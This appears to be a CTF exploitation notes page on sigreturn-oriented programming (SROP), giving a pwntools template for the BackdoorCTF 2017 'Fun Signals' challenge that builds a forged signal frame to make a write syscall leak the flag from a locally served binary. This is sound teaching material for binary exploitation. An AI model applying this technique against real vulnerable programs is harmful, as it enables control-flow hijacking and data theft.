SROP

Theory

Template: BackdoorCTF 2017 Fun Signals

#!/usr/bin/env python3
from pwn import *

elf = ELF("./funsignals_player_bin")
context.arch = 'amd64'

def srop(rax, rdi, rsi, rdx, rip):
    frame = SigreturnFrame()
    frame.rax = rax # syscall number for write()
    frame.rdi = rdi # stdout=1
    frame.rsi = rsi # the address of flag
    frame.rdx = rdx # leak how many bytes of data
    frame.rip = rip # the address of syscall

    return frame

if __name__ == "__main__":
    # socat tcp4-listen:1337,reuseaddr,fork exec:./funsignals_player_bin
    r = remote('127.0.0.1', 1337)
    frame = srop(
    rax=constants.SYS_write,
    rdi=constants.STDOUT_FILENO,
    rsi=elf.sym['flag'],
    rdx=50,
    rip=elf.sym['syscall'],
)
    r.send(bytes(frame))
    print(r.readall().decode())

PreviousBROP NextStack Pivot

Last updated 2 years ago